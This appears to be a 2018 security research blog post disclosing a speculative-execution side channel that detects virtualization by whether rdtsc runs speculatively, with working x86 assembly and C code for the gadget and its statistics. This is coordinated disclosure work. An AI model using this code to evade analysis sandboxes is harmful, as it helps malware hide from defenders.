Rumata888 May 22, 2018 at 15:55

New attack technique based on Meltdown. Using speculative instructions to detect virtualization

The Meltdown attack opened up a new class of processor attacks that use microarchitectural state to transmit information. But speculative execution, first exploited in Meltdown, makes it possible not only to run code past access checks but also to learn certain details about how the processor works. We have found a new way to mount attacks using microarchitectural state: it detects virtualization based on whether the processor chooses to execute certain instructions speculatively. We reported this method to Intel, and on May 21, 2018 the security advisory “Q2 2018 Speculative Execution Side Channel Update” was issued, which includes our vulnerability, CVE-2018-3640, also known as Spectre Variant 3a.

1. Introduction

The attack is based on a cache side channel similar to the one used in Meltdown. As you know, Meltdown uses speculative execution to access memory that should not be available without special privileges. This is possible because the processor executes certain instructions ahead of time to speed up code execution. Meltdown performs speculative reads from attacker-controlled buffers so that the attacker can use memory access time measurements as a side channel. The attack described here differs from Meltdown in that it does not use a cache access time threshold; instead, it records which page has the lowest access time.

2. Virtualization

VT-x technology in Intel processors lets the hypervisor choose whether a VMEXIT (a context switch to the hypervisor) occurs when certain instructions, such as rdtsc, are executed. Most virtualization environments enable rdtsc interception in their standard configuration; examples include VirtualBox, VMware, Hyper-V, and Parallels (on both Apple's hypervisor and Parallels' own). Because a VMEXIT is effectively a context switch, instructions that trigger one take longer to execute than they would in a non-virtualized environment.

3. Attack

A buffer of several pages is allocated. Then, instead of speculatively accessing protected memory to obtain data, the rdtsc instruction is executed speculatively and its result is used to index into the previously allocated buffer. The speculative code can touch only a specific part of the buffer, which makes it possible to tell speculative accesses apart from random noise. After the function containing the speculative code returns, the number of the page with the lowest access time is added to the statistics, and the cache is then flushed for the entire buffer. The following functions are used to trigger speculative execution and the memory access in 32-bit versions of Windows:

__declspec(naked) void herring() {        // This function is used to trigger
    __asm {                               // speculative execution in the
        xorps xmm0, xmm0                  // speculate function
        sqrtpd xmm0, xmm0                 // slow dependency chain; result stays 0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        sqrtpd xmm0, xmm0
        movd eax, xmm0                    // eax = 0
        lea esp, [esp+eax+4]              // skip the return address into speculate
        ret                               // architecturally returns to speculate's caller
    }
}
__declspec(naked) void __fastcall speculate(const char* detector) {
    __asm {                               // This function speculatively executes rdtsc and
        mfence                            // accesses the page corresponding to
        mov esi, ecx                      // the value rdtsc returned
        call herring
        rdtsc                             // These instructions
        and eax, 7                        // are executed speculatively
        or eax, 32                        //*
        shl eax, 12                       //*
        movzx eax, byte ptr [esi+eax]     //*
    }
}
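
The index arithmetic in speculate can be restated in plain C to show which part of the buffer the speculative load is able to touch. This is only a sketch of the same `and` / `or` / `shl` sequence: the names `touched_offset` and `in_expected_window` and the constants are ours, not part of the PoC, and the 4 KiB page size is an assumption implied by the shift by 12.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative constants derived from the asm above (names are ours). */
#define PAGE_SHIFT        12u  /* "shl eax, 12": assumes 4 KiB pages */
#define WINDOW_FIRST_PAGE 32u  /* "or eax, 32"                        */
#define WINDOW_PAGES       8u  /* "and eax, 7" keeps 3 bits: 8 pages  */

/* Byte offset into the detector buffer that the speculative load
 * touches for a given low dword of the time-stamp counter. */
static size_t touched_offset(uint32_t tsc_low)
{
    uint32_t page = (tsc_low & (WINDOW_PAGES - 1u)) | WINDOW_FIRST_PAGE;
    return (size_t)page << PAGE_SHIFT;
}

/* Nonzero if a page number lies in the window that speculation can reach. */
static int in_expected_window(size_t page)
{
    return page >= WINDOW_FIRST_PAGE &&
           page <  WINDOW_FIRST_PAGE + WINDOW_PAGES;
}
```

Whatever value rdtsc returns, the load lands on one of pages 32 to 39, so the buffer passed as detector has to span at least 40 pages, and a cached page anywhere else cannot have come from the speculative path.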

To mount the attack successfully, these steps must be repeated to build up the distribution of cached pages. As many repetitions are needed as it takes to collect sufficient statistics; the tests described here used 10,000 iterations. Then the number of misses, that is, iterations in which the fastest page lies outside the selected memory region, is counted. In virtualized environments with rdtsc interception enabled, such misses account for 50 to 99 percent of iterations; on non-virtualized systems, for less than one percent. The figure below shows this (the darker a memory region, the more hits were recorded for it). macOS, Ubuntu, Debian, and Windows were tested as non-virtualized systems, and Ubuntu, Debian, and Windows as guest systems.
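
The statistics step can be sketched in portable C as follows. This is a simplified illustration, not the PoC itself: the helper names are hypothetical, the per-page timings are assumed to have been measured elsewhere, and the 25 percent decision threshold is our assumption, chosen only because it falls between the "under 1 percent" and "50 to 99 percent" ranges reported above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define WINDOW_FIRST_PAGE 32u   /* pages reachable by the speculative load */
#define WINDOW_PAGES       8u
#define VIRTUALIZED_THRESHOLD 0.25  /* assumption, not taken from the PoC */

/* Index of the page with the lowest measured access time
 * (one call per iteration; the result is added to the histogram). */
static size_t fastest_page(const uint64_t *cycles, size_t n_pages)
{
    assert(n_pages > 0);
    size_t best = 0;
    for (size_t i = 1; i < n_pages; i++)
        if (cycles[i] < cycles[best])
            best = i;
    return best;
}

/* Fraction of iterations whose fastest page fell outside the window.
 * hits[i] counts how often page i was the fastest one. */
static double miss_fraction(const unsigned *hits, size_t n_pages)
{
    unsigned long total = 0, misses = 0;
    for (size_t i = 0; i < n_pages; i++) {
        total += hits[i];
        if (i < WINDOW_FIRST_PAGE || i >= WINDOW_FIRST_PAGE + WINDOW_PAGES)
            misses += hits[i];
    }
    return total ? (double)misses / (double)total : 0.0;
}

/* Nonzero if the histogram suggests rdtsc was not executed speculatively. */
static int looks_virtualized(const unsigned *hits, size_t n_pages)
{
    return miss_fraction(hits, n_pages) > VIRTUALIZED_THRESHOLD;
}
```

In use, each iteration would run the speculative function, time an access to every page, call `fastest_page`, increment the matching histogram entry, and flush the buffer; `looks_virtualized` is then evaluated once over the full histogram.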

Distribution of cached pages in different environments

4. Description of the attack

The attack uses speculative execution to make the processor disclose information about how rdtsc is executed. In a non-virtualized environment, rdtsc is executed on the processor itself, which simply returns a counter. In a virtualized environment where the “RDTSC exiting” bit is set in the primary processor-based VM-execution controls, rdtsc effectively causes a context switch, which takes far longer.

At the time the vulnerability was discovered, the publicly available documentation on Intel processor internals did not contain anything that would explain exactly what was happening. We have two hypotheses: either the processor decides that rdtsc will take too long and does not execute it until the execution flow actually reaches it, or no instruction that triggers a VMEXIT is ever executed speculatively. In a non-virtualized environment, rdtsc and the instructions immediately following it are executed speculatively, but in a virtualized environment this does not happen.

5. Conclusions and directions for future research

The described attack uses a new cache technique based on Meltdown to create a side channel that, instead of accessing privileged memory regions, reveals information about the processor's operating mode. Known timing-based methods for detecting virtualization depend heavily on using the rdtsc instruction as a timer, which lets a smart hypervisor defeat them by substituting the returned values. This attack can be countered in the same way, but with small changes to the code, time substitution by the hypervisor can no longer affect the result. We may publish a PoC of that version later.
We can conclude that in virtualized environments where rdtsc is intercepted, a variation of the described attack makes it possible to determine the presence of virtualization, and where it is not intercepted, previously known methods can be used, for example measuring the speed of operations on the TLB caches.

This attack makes it possible to detect virtualization quickly and easily in environments with standard settings, or in environments that deliberately intercept rdtsc to protect themselves from virtualization detection. The attack was successfully tested against a virtualized sandbox: the sandbox was detected without the detection code giving itself away.

PoC code can be found at the link
